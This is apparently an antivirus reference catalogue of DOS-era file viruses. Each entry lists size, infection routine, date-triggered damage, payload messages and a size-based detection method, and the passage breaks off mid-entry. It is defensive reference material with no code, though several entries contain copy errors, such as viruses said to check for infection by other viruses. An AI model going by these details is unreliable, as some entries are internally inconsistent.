Virus Name: Arcv-Fri Virus Type: File Virus (infects .COM files) Virus Length: 839 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is April 12; if "Yes", it searches for a .COM file in the current directory, then damages it. 2) If "No", then it searches for a .COM file in the current directory. 3) It checks whether it has been infected by ARCV-FRI. If "Yes", it continues to look for any uninfected .COM file. 4) It only infects one file at a time. 5) It then executes the original file. Damage: If the system date is April 12, it searches for a .COM file in the current directory, then damages it. Detection Method: Infected files will increase by 839 Bytes. Note: 1) Doesn't stay resident in memory. 2) ARCV-FRI doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Agent-B] Virus Name: Agent-B Virus Type: File Virus (infects .EXE and .COM files) Virus Length: 763 Bytes(COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Argent. If "Yes", it continues to look for any uninfected .COM file. 3) It will infect only two files at a time. Damage: None Detection Method: Infected files will increase by 763 bytes. Note: 1) Doesn't stay resident in memory. 2) Argent hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Nanite] Virus Name: Nanite Virus Type: File Virus (infects .EXE and .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM or .EXE file in the current directory. 2) Once it locates a file it checks whether it has been infected by Nanite. If "Yes", it continues to look for any uninfected .COM or .EXE file. 3) It will infect all .EXE and .COM files until all files in the current directory have been infected Damage: Overwrites the original files, so the length of infected files won't increase. Note: 1) Doesn't stay resident in memory. 2) Nanite doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Arcv-670] Virus Name: Arcv-670 Virus Type: File Virus (infects .COM files) Virus Length: 670 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by ARCV-670. If "Yes", it continues to look for any uninfected .COM file. 3) It will infect only one file at a time. 4) It finally checks the system date. If the date is between the 20th and 25th of December, and the year is larger than 1992, it will show the message: "Happy Xmas from the ARCV", then the system halts. Damage: If the system date is between the 20th and 25th of December and the year is larger than 1992, this message appears: "Happy Xmas from the ARCV", then the system halts. Detection Method: Infected files will increase by 670 Bytes. Note: 1) Doesn't stay resident in memory. 2) ARCV-670 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Why] Virus Name: Why Virus Type: File Virus (infects .COM files) Virus Length: 457 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Why. If "Yes", it continues to look for any uninfected .COM file. 3) It will only infect one file at a time. 4) It then checks the system date. If the date is the 12th of May or the 25th of February, the virus will damage all files on the hard disk. Damage: If the system date is May 12 or February 25, the virus will damage all files on the hard disk. Detection Method: Infected files will increase by 457 Bytes. Note: 1) Doesn't stay resident in memory. 2) "Why" doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [FCB] Virus Name: Fcb Virus Type: File Virus (infects .EXE and .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by FCB. If "Yes", it continues to look for any uninfected .COM file. 3) It will only infect one file at a time. 4) Searches for an .EXE file in the current directory. 5) Once it locates a file it checks whether it has been infected by FCB. If "Yes", it continues to look for any uninfected .EXE file. 6) It will only infect one file at a time. Damage: Overwrites the original file, so the length of the infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) FCB doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Casper] Virus Name: Casper Virus Type: File Virus (infects .COM files) Virus Length: 1200 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is the first of April. If "yes", then it formats the current disk, 2) If "no", then it searches for a *.C* file in the current directory. 2) Once it locates a file it checks whether it has been infected by FCB. If "Yes", it continues to look for any uninfected *.C* file. 3) It will only infect one file at a time. 4) It then executes the original file. Damage: If the system date is the 1st of April, it formats the current disk. Detection Method: Infected files will increase by 1200 Bytes. Note: 1) Doesn't stay resident in memory. 2) Casper doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Diogenes] Virus Name: Diogenes Virus Type: File Virus (infects .COM files) Virus Length: 946 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is the 31st. If "Yes", it damages all files on the hard disk, then displays this message on the screen: "DIOGENES 2.0 has visited your hard drive...... This has been another fine product of the Lehigh Valley...Watch (out) for future 'upgrades'.. ... The world's deceit has raped my soul. We melt the plastic people down, then we melt their plastic town." 2) If "NO', then it searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Diogenes. If "Yes", it continues to look for any uninfected .COM file. 3) It will only infect one file at a time. Damage: If the system date is the 31st, it damages all files on the hard disk. Detection Method: Infected files will increase by 946 Bytes. Note: 1) Doesn't stay resident in memory. 2) Diogenes doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Brothers-2] Virus Name: Brothers-2 Virus Type: File Virus (infects .COM files) Virus Length: 693 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is between the 11th and 25th of November or December. If "Yes", it shows the message: "Brotherhood... I am seeking my brothers "DEICIDE" and "MORGOTH"," then executes the original file. 2) If "NO', then it searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Brothers-2. If "Yes", it continues to look for any uninfected .COM file. 3) It will check whether the second word of the .COM file is "0xADDE"; if "yes", it will show the message: "Found my brother MORGOTH!!!." Then executes the original file. 4) It will also check whether the second word of the .COM file is "0x0D90"; if "yes", it will show the message: "Found my brother "DEIGOTH" !!!." Then executes the original file. 5) If "NO", then it will infect .COM files one at a time. 6)It will execute the original file. Damage: None Detection Method: Infected files will increase by 693 Bytes. Note: 1) Doesn't stay resident in memory. 2) Brothers-2 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Mindless] Virus Name: Mindless Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is Sunday. If "yes", it damages all files on the hard disk. 2) If "NO', then it searches for a *.C* file in the current directory. 2) Once it locates a file it infects it and continues searching until it infects all the *.C* files in the current directory. Damage: 1) If the system date is Sunday, it damages all files on the hard disk. 2) Overwrites original files, so the length of infected files won't increase. Detection Method: None Note: 1) Doesn't stay resident in memory. 2) Mindless doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Acme] Virus Name: Acme Virus Type: File Virus (Companion Virus) Virus Length: 932 Bytes PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system time is after 4 o'clock in the afternoon. If "Yes", a sound is made, then the system halts. 2) If "NO', then it searches for an .EXE file in the current directory. 3) It will then create a 923 bytes, "hidden & read-only" .COM file with the .EXE file name. Damage: If the system time is after 4 o'clock in the afternoon, a sound is made, then the system halts. Detection Method: Check whether there are "hidden" .COM files with 923 bytes of data. Note: 1) Doesn't stay resident in memory. 2) ACME doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Dest1] Virus Name: DEST1 Virus Type: File Virus (only infects .COM files) Virus Length: 323 Bytes PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for a COM file in the current directory. 2) It checks whether it has been infected by Dest1. If "Yes", it continues to look for an uninfected .COM file. 3) It then infects any uninfected .COM file, one file at a time. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 323 Bytes. Note: 1) Doesn't stay resident in memory. 2) Dest1 hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Dest2] Virus Name: DEST2 Virus Type: File Virus (infects .COM files only) Virus Length: 478 Bytes PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for a COM file in the current directory. 2) It checks whether it has been infected by Dest2. If "Yes", it continues to look for an uninfected .COM file. 3) It then infects the .COM file. It finally executes the original file. Damage: If kill-flag=-1, it then deletes a file. Detection method: Infected files will increase by 478 Bytes. Note: 1) Doesn't stay resident in memory. 2) Dest2 hook INT 24h when infecting files. Omits I/O error (such as write protect). [Cyber101] Virus Name: CYBER101 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 946 Bytes(COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for a .COM or .EXE file in the current directory. 2) It checks whether it has been infected by Cyber101. If "Yes", it continues to look for an uninfected .COM or .EXE file. 3) It then infects any .COM or .EXE files in the current directory two at a time. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 946 Bytes. Note: 1) Doesn't stay resident in memory. 2) Cyber101 hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Cyber] Virus Name: CYBER Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 1092 Bytes(COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for a .COM or .EXE file in the current directory. 2) It checks whether it has been infected by Cyber. If "Yes", it continues to look for an uninfected .COM or .EXE file. 3) It then infects any .COM or .EXE file in the current directory two at a time. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 1092 Bytes. Note: 1) Doesn't stay resident in memory. 2) Cyber hooks INT 24h when infecting files. Omits I/O error (such as write protect). [7thson-2] Virus Name: 7THSON-2 Virus Type: File Virus (infects .COM files) Virus Length: 284 or 332 or 350 Bytes(COM) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for a .COM file in the current directory. 2) It checks whether it has been infected by 7thson-2. If "Yes", it continues to look for an uninfected files. 3) It then infects all .COM files in the current directory. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 284, 332, or 350 Bytes. Note: 1) Doesn't stay resident in memory. 2) 7thson-2 hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Bamestra] Virus Name: BAMESTRA Virus Type: File Virus (infects .EXE files) Virus Length: 530 Bytes(EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE file in the current directory. 2) It checks whether it has been infected by Bamestra. If "Yes", it continues to look for an uninfected .EXE file. 3) It then infects any .EXE file in the current directory two at a time. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 530 Bytes. Note: 1) Doesn't stay resident in memory. 2) Bamestra hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Abraxas] Virus Name: ABRAXAS Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 546 Bytes(COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by Abraxas. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects all .EXE and .COM files in the current directory. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 546 Bytes. Note: 1) Doesn't stay resident in memory. 2) Abraxas hooks INT 24h when infecting files. Omits I/O error (such as write protect). [MPC-1] Virus Name: MPC-1 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 641 Bytes (COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by MPC-1. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects all .EXE and .COM files in the current directory. 4) Finally it executes the original file. Damage: None Detection method: Infected files will increase by 641 Bytes. Note: 1) Doesn't stay resident in memory. 2) MPC-1 hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Zeppelin] Virus Name: ZEPPELIN Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 1508 Bytes (COM and EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by Abraxas. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects any .EXE and .COM files in the current directory four at a time. 4) Finally it displays various codes, and sounds are made at the same time, then the system halts. Damage: Shows codes, and makes strange sounds at the same time, then the system halts. Detection method: 1) Infected files will increase by 1508 Bytes. 2) Codes appear on the screen. Note: 1) Doesn't stay resident in memory. 2) Zeppelin hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Crumble] Virus Name: CRUMBLE Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 778 Bytes (COM & EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by Crumble. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects any .EXE or .COM files in the current directory two files at a time. 4) Finally it checks the system date; if it is Friday, the message "falling letter" appears on the screen, then a letter falls every 5 seconds on the screen. Damage: If it is Friday, system will display "falling letter." Detection method: Infected files will increase by 778 Bytes. Note: 1) Doesn't stay resident in memory. 2) Crumble hooks INT 24h when infecting files. Omits I/O error (such as write protect). [COL-MAC] Virus Name: COL_MAC Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 1022 Bytes (COM and EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by COL_MAC. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects any two .EXE and .COM files in the current directory. 4) Finally it shows a lot of random letters on the screen until the ENTER key is pressed. Damage: None Detection method: Infected files will increase by 1022 Bytes. Note: 1) Doesn't stay resident in memory. 2) COL_MAC hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Galileo] Virus Name: GALILEO Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 760 Bytes (COM and EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) Checks whether system date is Monday; if "Yes", the virus will damage all files on the hard disk. 2) It searches for a .COM or .EXE file in current directory. 3) It then infects all .COM and .EXE files in the current directory. Damage: If it is Monday, the virus will damage all files on the hard disk. Detection method: Infected files will increase by 760 Bytes. Note: 1) Doesn't stay resident in memory. 2) Galileo hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Wharps] Virus Name: WHARPS Virus Type: File Virus (infects .COM files) Virus Length: 572 Bytes (COM) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus checks whether the system time is 3 o'clock in the morning; if "Yes", the message appears on the screen: "wHaRpS! It is 3:00 a.m. > ETERNAL." 2) It searches for a .COM file in the current directory. 3) It then checks whether it has been infected by Wharps. If "Yes", it continues to look for an uninfected .COM file, infecting each file one at a time. 5) Finally it executes the original file. Damage: Infected files can't be executed. Detection method: Infected files will increase by 572 Bytes. Note: 1) Doesn't stay resident in memory. 2) Wharps hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Bubbles-2] Virus Name: BUBBLES-2 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 927 Bytes (COM and EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by Bubbles-2. If "Yes", it continues to look for an uninfected .EXE or .COM file. 3) It then infects all .EXE and .COM files in the current directory. 4) It finally checks whether the system date is the 13th and year is not smaller than 1993, then it displays this message on the screen: "Bubbles 2 : "Its back and better then ever. Is it me or does that make no sense at all?" Damage: Infected files can't be executed. Detection method: Infected files will increase by 927 Bytes. Note: 1) Doesn't stay resident in memory. 2) Bubbles-2 hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Cybertech] Virus Name: CYBERTECH Virus Type: File Virus (infects .COM files) Virus Length: 1076 Bytes (COM) PC Vectors Hooked: INT 24h Execution Procedure: 1) It checks whether the system date is smaller than 1993. If "Yes", then the virus searches for a .COM file in the current directory. 2) It checks whether it has been infected by Cybertech. If "Yes", it continues to look for an uninfected .COM file. 3) It then infects any .COM file in the current directory one at a time. 4) If "no", then this message appears on the screen: "The previous year you have been infected by a virus without knowing or removing it. To be gentle to you I decided to remove myself from your system. I suggest you better buy VirusScan of McAfee to ensure yourself complete security of your precious data. Next time you could be infected with a malevolent virus. May I say goodbye to you for now. CyberTech Virus-Strain A (c) 1992 John Tardy of Trident". It finally restores the current file as before. Damage: None Detection method: Infected files will increase by 1076 Bytes. Note: 1) Doesn't stay resident in memory. 2) Cybertech hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Crazy] Virus Name: CRAZY Virus Type: Boot Strap Sector Virus Virus Length: 4006 Bytes PC Vectors Hooked: None Execution Procedure: This virus infects no file, partition or boot sector. When it is executed, it will create 50 subdirectories, 50 subdirectories are created in each subdirectory. Damage: None Detection method: None Note: 1) Doesn't stay resident in memory. 2) Crazy doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Burger_560-8] Virus Name: BURGER_560-8 Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in A:. 2) It checks whether it has been infected by Burger_560-8. If "Yes", it continues to look for an uninfected .COM file. 3) It then infects an uninfected file one at a time. 4) If no .COM file is infected, it will continue to look for an .EXE file in A:. 5) It finally renames the .EXE file to .COM, then it infects the .COM file. Damage: Overwrites the original file, so the length of the infected file won't increase. Detection method: Changes .EXE file to a .COM file. Note: 1) Doesn't stay resident in memory. 2) Burger_560-8 don't hooks INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Boys] Virus Name: BOYS Virus Type: File Virus (infects .COM files) Virus Length: 500 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) It searches for an .EXE file, it then changes the attribute to "SYSTEM". 2) It searches for a .COM file in the current directory. 3) It then checks whether it has been infected by Boys. If "Yes", it continues to look for an uninfected .COM file. 4) It only infects one file at a time, and changes the attribute to "READ-ONLY". 5) Finally it executes the original file. Damage: None. Detection method: Infected files will increase by 500 Bytes. Note: 1) Doesn't stay resident in memory. 2) Boys doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Null] Virus Name: NULL Virus Type: File Virus (infects .COM files) Virus Length: 733 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) It first decodes. 2) Then it searches for a .COM file in the current directory. 3) It checks whether it has been infected by Null. If "Yes", it continues to look for an uninfected .COM file. 4) It infects only one file at a time. 5) It then executes the original file. 6) If it can not infect a .COM file, then it checks whether the DAY =30. If "yes", it destroys all the data on the disk, then shows the message: "Your disk is dead! Long life Doomsday 1.0." Damage: If DAY = 30 , then it destroys all data on the current disk. Detection method: Infected files will increase by 733 Bytes. Note: 1) Doesn't stay resident in memory. 2) Null doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Vienna-11] Virus Name: VIENNA-11 Virus Type: File Virus (infects .COM files) Virus Length: 943 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the clock's Seconds field is equal to .0004. If "Yes", then this message will appear on the screen: "Sorry this computer is no longer operational due to an outbreak of Bush is hero, Have a Nice day. . . " 2) Next it will check as to whether the time is equal to 7:45 and 24th of March. If "Yes", then a message will appear on the screen: "VIPERizer, Strain B (c) 1992, Stin gray/VIPER Happy Valentines Day !" It then destroys all data on all of the disks including the hard disk. 3) If "No", then it searches for a .COM file in the current directory. 4) Checks whether it has been infected by Vienna-11. If "Yes", it continues to look for an uninfected .COM file. 5) It only infects one file at a time, afterwards it executes the original file. Damage: Destroys all data on all of the disks. Detection method: Infected files will increase by 943 Bytes. Note: 1) Doesn't stay resident in memory. 2) Vienna-11 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Intrud-B] Virus Name: INTRUD-B Virus Type: File Virus (infects .EXE files) Virus Length: 1225 Bytes (EXE) PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE file in the current directory. 2) It checks whether it has been infected by Intrud-B. If "Yes", it continues to look for an uninfected .EXE file. 3) It then infects only one file at a time. 4) It then executes the original file. Damage: None Detection method: Infected files will increase by 1225 Bytes. Note: 1) Doesn't stay resident in memory. 2) Intrud-B doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [New-s] Virus Name: NEW-S Virus Type: File Virus (infects .EXE files) Virus Length: 1214 Bytes PC Vectors Hooked: None Execution Procedure: 1) First shows a strange figure on the screen (with music). 2) Then searches for an EXE file in the current directory. It then creates a file of the same name with the length of 1214 bytes and overwrites the original file. The new file is New-S. 3) Finally it overwrites the COMMAND.COM in the root directory and copies the overwritten file to the root directory. Damage: Overwrites original file. Detection method: Infected files will increase by 1214 Bytes. Note: 1) Doesn't stay resident in memory. 2) NEW-S doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [X-1-B] Virus Name: X-1-B Virus Type: File Virus (infects .EXE files) Virus Length: 555 Bytes (EXE) PC Vectors Hooked: None Execution Procedure: 1) The virus checks whether the system date is the 5th of March. If "Yes", it displays the message: "ICE-9 Present In Association with.. The ARcV [X-1] Michelangelo activates. . -<TOMORROW>-," then the system halts. 2) If "No", then it searches for an .EXE file in the current directory. 3) It checks whether it has been infected already by X-1. If "Yes", it continues to look for an uninfected .EXE file. 4) It then infects only one file at a time. 5) Then it executes the original file. Damage: If it is the 5th of March, it displays a message, and then the system halts. Detection method: Infected files will increase by 555 Bytes. Note: 1) Doesn't stay resident in memory. 2) X-1 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Lep-FVHS] Virus Name: LEP-FVHS Virus Type: File Virus (infects .COM and .EXE files) Virus Length: NO change PC Vectors Hooked: None Execution Procedure: 1) Shows the message: "allocating memory..... Please wait..... Hard time accessing memory, please turn off all RAM resident programs and press>>Enter<< to continue...." 2) The virus searches for an .EXE or .COM file in the current directory. 3) It checks whether it has been infected by LEP-FVHS. If "Yes", it continues to look for an uninfected .EXE or .COM file. 4) If "No", it then infects any four .EXE and .COM files at a time in the current directory. 5) Shows the message: "Program too big to fit in memory." Damage: Overwrites original files, so the length of infected files won't increase. Detection method: Shows the message: "Allocating memory...." Note: 1) Doesn't stay resident in memory. 2) LEP-FVHS doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Monxla] Virus Name: MONXLA Virus Type: File Virus (infects .COM files) Virus Length: 939 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) The virus searches for a .COM file in the current directory. 2) It checks whether the system date is the 13th; if "Yes", then it destroys the file. 3) If "No", it checks whether it has been infected by MONXLA. If "Yes", it continues to look for an uninfected .COM file. 3) It then infects any one .COM file in the current directory. 4) Finally it executes the original file. Damage: If the system date is the 13th, then it destroys a .COM file. Detection method: Infected files will increase by 939 Bytes. Note: 1) Doesn't stay resident in memory. 2) MONXLA doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [More-649] Virus Name: MORE-649 Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 649 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h), execute program Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any uninfected file that is executed. (b) It doesn't infect .EXE files or files with special dates (year larger than 1999). 4) When the virus detects a file that has a date larger than 1999, this message appears: "OH NO NOT MORE ARCV". Damage: None Detection method: Infected .COM files increase by 649 Bytes. [Arka] Virus Name: ARKA Virus Type: Memory Resident, File Virus (infects .COM files). Virus Length: 1905 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h), execute program Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any executed file that is not already infected with the ARKA virus. Damage: None Detection method: Infected COM files increase by 1905 Bytes. [578] Virus Name: 578 Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 578 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h), execute program Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident in memory it will infect any uninfected file that is executed. (b) It doesn't infect .EXE files. 4) The virus will then check the system date; if it is later than April 3, then the virus will destroy all data on A: followed by the displaying of three colored flags and the message: "ITALY IS THE BEST COUNTRY IN THE WORLD." Damage: If the system date is later than April 3, the virus will destroy all data on A:. Detection method: Infected COM files increase by 578 Bytes. Note: 1) 578 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [5LO] Virus Name: 5LO Virus Type: Memory Resident, File Virus (infects .EXE files). Virus Length: 1125-1140 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. (b) It doesn't infect .COM files. Damage: None Detection method: Infected .EXE files increase by 1125-1140 Bytes. Note: The 5LO virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Aids 552] Virus Name: AIDS552 Virus Type: Highest Memory Resident, File Virus (infects .EXE files) Virus Length: 552 Bytes (EXE) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether it is already loaded resident into memory. If "No", it then loads itself into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) It infects when the command "DEGUG FILE_NAME.EXE" is executed. b) Doesn't infect .COM files. Damage: None Detection method: Infected .EXE files increase by 552 Bytes. Note: The AIDS552 virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [408] Virus Name: 408 Virus Type: Memory Resident, File Virus (infects .COM files). Virus Length: 408 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Detection method: Infected files increase by 408 Bytes. Note: The 408 virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [BOOJUM] Virus Name: BOOJUM Virus Type: Highest Memory Resident, File Virus (infects .EXE files) Virus Length: 340 Bytes (EXE) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded into memory it will infect any uninfected file that is executed. b) It doesn't infect .COM files. Damage: None Detection method: Infected EXE files increase by 340 Bytes. Note: The BOOJUM virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Shirley] Virus Name: SHIRLEY Virus Type: Memory Resident, File Virus (infects .EXE files). Virus Length: 4110 Bytes (EXE) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .COM files. Damage: None Detection method: Infected EXE files increase by 4110 bytes. Note: The Shirley virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [D-Tiny] Virus Name: D-TINY Virus Type: Memory Resident, File Virus (infects .COM files). Virus Length: 126 Bytes (COM) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. It doesn't infect .EXE files. Damage: None Detection method: Infected COM files increase by 126 Bytes. Note: D-TINY doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [01-07] Virus Name: 01-07 Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 639 Bytes (COM) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether the system date is between the 1st and the 6th of January. If "Yes", it shows the message:" Happy New Year " on the screen and the system halts. If "No", the virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: System halts when the system date is between the 1st and 6th of January. Detection method: Infected files increase by 639 Bytes. Note: The 01-07 virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Bit_Addict] Virus Name: BIT_ADDICT Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 477 Bytes (COM) PC Vectors Hooked: INT 21h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: When the virus has already infected 100 files, it will destroy all data on the hard disk, then show the message: "BIT ADDICTMZ> .... The Bit Addict says: You have a good tasting hard disk, it was delicious !!!" Detection method: Infected files increase by 477 Bytes. Note: The BIT_ADDICT virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [CSL-2] Virus Name: CSL-2 Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 709 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 709 Bytes. Note: The CSL-2 virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Highland] Virus Name: HIGHLAND Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 477 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: When the system date is the 29th, all files infected by Highland can't be executed. Detection method: Infected files increase by 477 Bytes. Note: Highland doesn't hook INT 24h when infecting files. An error 